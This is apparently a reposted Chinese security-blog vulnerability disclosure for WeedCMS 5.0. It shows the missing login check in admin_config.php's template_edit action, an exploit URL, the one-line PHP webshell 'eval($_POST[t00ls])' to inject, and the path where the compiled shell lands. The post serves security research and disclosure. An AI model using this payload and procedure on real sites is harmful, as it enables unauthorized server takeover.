野草内容管理系统 WeedCMS 5.0 写马漏洞

admin
admin
admin
139708
文章
114
评论
2021年4月3日18:55:42评论22 views字数 953阅读3分10秒阅读模式

    问题文件在:includes/admin_config.php。

    这个程序登录验证是一个对每个方法来验证登录,而不是对整个文件来验证。还是那句,看代码。

includes/admin_config.php”中的问题代码:

if($do=='template_edit'){
    $file=empty($_GET['file'])?'':trim($_GET['file']);
    if(get_ext($file)!='html'&&get_ext($file)!='css'){
        exit('对不起,参数非法!');
    }
    $content=file_get_contents('templates/'.$config['site_template'].'/'.$file);
    $smarty=new smarty();smarty_header();
    $smarty->assign('file',$file);
    $smarty->assign('content',$content);
    $smarty->display('template_info.htm');
}

    文件开头的方法每个IF后都验证一次,最后2个没有,估计这2个功能是后期加上去,可能当时作者的老人痴呆症发作了……

    EXP:http://127.0.0.1/admin.php?action=config&do=template_edit&file=part_vote.html

    在文件头插入“ eval($_POST[t00ls]);?>”,然后访问一次首页缓存就生成出来了。

    最后马儿就在:http://127.0.0.1/temps/compile/part_vote.html.php。

文章来源于lcx.cc:野草内容管理系统 WeedCMS 5.0 写马漏洞

相关推荐: 一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式?

一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式? safe121 (Great Leader Kim Jong-Un General Long Live!!!) | 2014-02-12 07:37 话说今年春节的时候,老夫一基友同学回国过…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:55:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   野草内容管理系统 WeedCMS 5.0 写马漏洞http://cn-sec.com/archives/319250.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息